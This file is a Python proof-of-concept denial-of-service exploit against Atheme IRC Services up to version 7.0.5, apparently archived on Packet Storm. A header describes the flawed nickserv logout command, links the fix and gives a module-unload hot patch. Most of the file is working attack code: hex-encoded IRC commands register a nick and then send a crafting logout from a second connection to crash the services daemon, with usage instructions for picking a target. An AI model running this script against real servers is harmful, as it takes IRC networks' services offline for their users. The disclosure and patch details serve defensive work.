#!/usr/bin/python3 ################################################################################### # Monday, January 13, 2013 # # # # _ _ .__ .__ # __| || |_| | ____ ____ |__| ____ ____ # \ __ / | _/ __ \ / ___\| |/ _ \ / \ # | || || |_\ ___// /_/ > ( <_> ) | \ # /_ ~~ _\____/\___ >___ /|__|\____/|___| / # |_||_| \/_____/ \/ # http://www.zempirians.com # # 00100011 01101100 01100101 01100111 01101001 01101111 01101110 # # # # -=[ Atheme - IRC Services Daemon ] =- # # [P]roof [o]f [C]oncept, Denial of Service # # # # ################################################################################### # # T E A M # # ####################### # # O_O .....> Sent To Play All Alone <3 # UberLame .....> For Providing More Sweet, Sweet Cycles # Aph3x .....> For Being Awesome # Apetrick .....> For Not Letting Me Play With Him # ################################################################################### # # ~~! SHOUT OUTS !~~ # # a heyoz Eurydemus # nikka l1nd BinaryTENSHi # syk Gatsby # # ~~! Special Thanks !~~ # # Packet Storm Security (www.packetstormsecurity.com) for archiving our # concepts in order to help secure and educate those who read them. # ################################################################################### # SUMMARY # ################ # # Bug Fix: [12/20/12]: https://github.com/atheme/atheme/commit/1aaa9e8f1d0b0b67b36c2a6318c71beaa7f39194 # # Improper implementation of the logout command, results in a segfault # when an unauthenticated user tries to deauth another authenticated user. # ################ # VULNERABLE # ################ # # Atheme Services up to 7.0.5 [and with logout.c loaded (by default)] # ################ # CVE # ################ # # [ No CVE Has Been Reported ] # ################ # PATCH # ################ # # - Proper Fix # - Update To Current Version From GitHub # # - Hot Patch # - Unload nickserv/logout # > /quote operserv modunload nickserv/logout # $ !services.global! Module nickserv/logout unloaded. # $ -OperServ- Module nickserv/logout unloaded. # ################################################################################### # # # # # H O W - T O # # # # # ####################### # # Provide the Target: Server, Nickname, Password and Optionally the Port, and the # script will deliver the staged payload... # # [!USE/]$ ./<file>.py -t <server> -P <port> -n <nickname> -p <password> # ################################################################################### from argparse import ArgumentParser import socket # DIRTY HACK TO CONVERT STRINGS TO HEX def toHex( string_data ): return ''.join(''.join([ hex( ord( ch ) ) for ch in string_data ]).split( '0x' )) def deploy( sock, target, port, nick, passwd ): try: sock.connect(( target, int( port ) )) except: print( "\t[-] Payload Deployment Failed!" ) exit() sock.send( b'\x4e\x49\x43\x4b\x20\x5f\x7a\x65\x6d\x70\x30\x64\x61\x79\x5f\x0d\x0a' ) sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45' + \ b'\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20\x3c\x33' + \ b'\x0d\x0a' ) while True: host_data = str( sock.recv(4096).strip() ) if ' 396 ' in host_data: sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4c4f474f555420{}20{}0d0a'.format( \ toHex( nick ), toHex( passwd ) ) ) ) print( '\t[+] Payload Deployed! <3' ) break sock.send( b'\x51\x55\x49\x54\x0d\x0a' ) return sock.close() def stage( target, port, nick, passwd ): sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) p_sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) try: sock.connect(( target, int( port ) )) except: print( "[-] Failed To Connect To {}".format( target ) ) exit() sock.send( bytes.fromhex( '4e49434b20{}0d0a'.format( toHex( nick ) ) ) ) sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48' + \ b'\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20' + \ b'\x3c\x33\x0d\x0a' ) while True: host_data = str( sock.recv( 8096 ).strip() ) if ' 396 ' in host_data: sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a524547495354455220' + \ '{}2064657673407a656d70697269616e732e636f6d0d0a0d0a'.format( toHex( passwd ) ) ) ) sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4944454e5449465920{}0d0a'.format( toHex( passwd ) ) ) ) print( '\t[+] Staging Successful, Deploying Payload Against Target {}'.format( target ) ) deploy( p_sock, target, port, nick, passwd ) break try: msg = host_data.split() if msg[0].lower() is 'ping': sock.send( b"PONG {}\r\n".format( msg[1] ) ) except: pass sock.send( b'\x51\x55\x49\x54\x0d\x0a' ) sock.close() if __name__ == '__main__': parser = ArgumentParser( description='#legion Atheme IRC Services DoS' ) parser.add_argument( '-t', '--target', dest='target', help='IRCD Server To Connect On' ) parser.add_argument( '-P', '--port', dest='port', default=6667, help='Port To Connect On' ) parser.add_argument( '-n', '--nick', dest='nick', default='zemp0day', help='Nick To Use' ) parser.add_argument( '-p', '--pass', dest='passwd', default='yad0pmez', help='Password To Use' ) args = parser.parse_args() if args.target is None: parser.print_help() exit() stage( args.target, args.port, args.nick, args.passwd )